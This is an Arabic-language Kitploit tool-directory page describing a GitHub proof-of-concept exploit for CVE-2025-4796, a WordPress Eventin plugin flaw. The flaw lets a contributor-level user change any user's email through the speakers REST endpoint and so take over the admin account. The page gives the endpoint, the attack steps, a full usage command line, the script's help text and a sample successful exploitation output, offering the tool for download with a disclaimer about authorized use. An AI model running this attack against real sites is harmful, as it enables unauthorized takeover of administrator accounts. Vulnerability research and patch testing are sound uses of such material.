Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-4796 — Eventin <= 4.0.34 - تصعيد امتيازات عبر مستخدم مصادَق (مساهم+) عن طريق تغيير البريد الإلكتروني للمستخدم/الاستيلاء على الحساب | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-4796
المصادقة والترخيصتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليم
GitHubnxploited/cve-2025-4796

CVE-2025-4796

Eventin <= 4.0.34 - تصعيد امتيازات عبر مستخدم مصادَق (مساهم+) عن طريق تغيير البريد الإلكتروني للمستخدم/الاستيلاء على الحساب

عرض المستودع
منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-4796

Eventin <= 4.0.34 - تصعيد امتيازات لمستخدم مصادق (بصلاحية Contributor+) عبر تغيير البريد الإلكتروني للمستخدم/الاستيلاء على الحساب

🛡️ Eventin <= 4.0.34 - تصعيد امتيازات لمستخدم مصادق (بصلاحية Contributor+) (CVE-2025-4796)

📌 نظرة عامة

يوثق هذا المستودع ثغرة تصعيد امتيازات في إضافة Eventin الخاصة بووردبريس (<= 4.0.34) تسمح لمستخدم مصادق بصلاحيات Contributor+ أو أعلى بتغيير عناوين البريد الإلكتروني لأي مستخدم عبر واجهة برمجة تطبيقات تحديث المتحدث (speaker) في الإضافة. من خلال تغيير بريد مدير الموقع، يمكن للمهاجم تفعيل إعادة تعيين كلمة المرور والاستيلاء على الحساب.

  • المكوّن المعرّض: إضافة Eventin لووردبريس (Eventin\Speaker\Api\SpeakerController::update_item)

  • الإصدارات المتأثرة: <= 4.0.34

  • CVE: CVE-2025-4796

  • CVSS: 8.8 (عالي)

  • التثبيتات النشطة: 10,000+

⚠️ تفاصيل الثغرة

لا تتحقق Eventin بشكل صحيح من هوية أو صلاحية المتصل قبل تحديث تفاصيل المتحدث/المستخدم (وتحديدًا البريد الإلكتروني). يمكن للمهاجم الذي تمت مصادقته كمساهم (أو أعلى) تغيير عنوان البريد الإلكتروني لمستخدمين آخرين — بمن فيهم مديرو الموقع — باستخدام نقطة نهاية REST التابعة للإضافة:

  • PUT /wp-json/eventin/v2/speakers/<speaker_id>

بمجرد تغيير البريد إلى عنوان يتحكم به المهاجم، يمكن استخدام سير عمل إعادة تعيين كلمة المرور القياسي في ووردبريس للاستيلاء على الحساب.

🧰 السكربت (PoC)

اسم الملف: CVE-2025-4796.py

يقوم هذا السكربت بأتمتة الخطوات التالية:

  1. تسجيل الدخول إلى موقع ووردبريس المستهدف باستخدام بيانات الاعتماد المقدمة.
  2. استخراج قيمة X-WP-Nonce المطلوبة.
  3. إرسال طلب PUT إلى /wp-json/eventin/v2/speakers/<speaker_id> لتحديث البريد الإلكتروني للمتحدث.
  4. طباعة وتنسيق استجابة JSON ورسالة نجاح احترافية.

المتطلبات:

  • Python 3.8+
  • requests

التثبيت:

root@kitploit:~
pip install requests

🚀 الاستخدام

شغّل السكربت من سطر الأوامر:

root@kitploit:~
python CVE-2025-4796.py -u https://target.site -id 9 -email [email protected] -user contributor_user -pass contributor_password

اعرض مساعدة السكربت:

root@kitploit:~
python CVE-2025-4796.py -h

📝 خيارات سطر الأوامر (مساعدة)

root@kitploit:~
usage: CVE-2025-4796.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD

Exploit For: CVE-2025-4796 By: Nxploited

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -id, --speaker_id SPEAKER_ID
                        Enter the speaker ID for the user
  -email, --email EMAIL
                        Enter a new email address
  -user, --username USERNAME
                        Enter the username for the account to upgrade
  -pass, --password PASSWORD
                        Enter the password for the account to upgrade


✅ مثال على مخرجات ناجحة

root@kitploit:~
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...

[+] Exploitation in progress, please wait ...

[+] Exploitation successful.
[+] The account has been updated to Admin.
    Speaker ID   : 9
    Email        : [email protected]

[!] Please reset your password using the email: [email protected]

⚖️ الإفصاح المسؤول وإخلاء المسؤولية

  • تم توفير هذا المستودع لأغراض البحث الأمني والاختبار والحماية.
  • لا تستخدم هذه التقنيات ضد أنظمة لا تملكها أو ليس لديك إذن صريح باختبارها.
  • استغلال الثغرات دون إذن أمر غير قانوني وغير أخلاقي.
  • إذا كنت مالك موقع وتعتقد أن موقعك معرّض للثغرة، فقم بتحديث Eventin إلى أحدث إصدار أو طبّق التصحيحات الصادرة عن المورد فورًا.
  • استخدم هذا الكود فقط في بيئات مصرح بها (بيئة اختبار معملية، اختبار اختراق معتمد من العميل، أو بإذن صريح).

🧾 ماذا يفعل السكربت (باختصار)

  • يتحقق من المدخلات (URL والبريد الإلكتروني) ويوحّد مخطط عنوان URL.
  • يعطّل تحذيرات SSL (اختياري؛ يُستخدم لدعم الاختبار ضد بيئات التطوير الموقّعة ذاتيًا).
  • يسجل الدخول باستخدام بيانات اعتماد ووردبريس المقدمة ويتحقق من تسجيل الدخول عبر ملفات تعريف الارتباط (cookies).
  • يجلب قيمة X-WP-Nonce من صفحة الإدارة.
  • يرسل طلب PUT مصادقًا عليه لتحديث البريد الإلكتروني للمتحدث.
  • يطبع استجابة JSON المنسقة وملخص نجاح نهائي قابل للقراءة.

👤 الاعتمادات

من: Khaled Alenaz (Nxploited)
GitHub: https://github.com/Nxploited/

تنزيل الأداة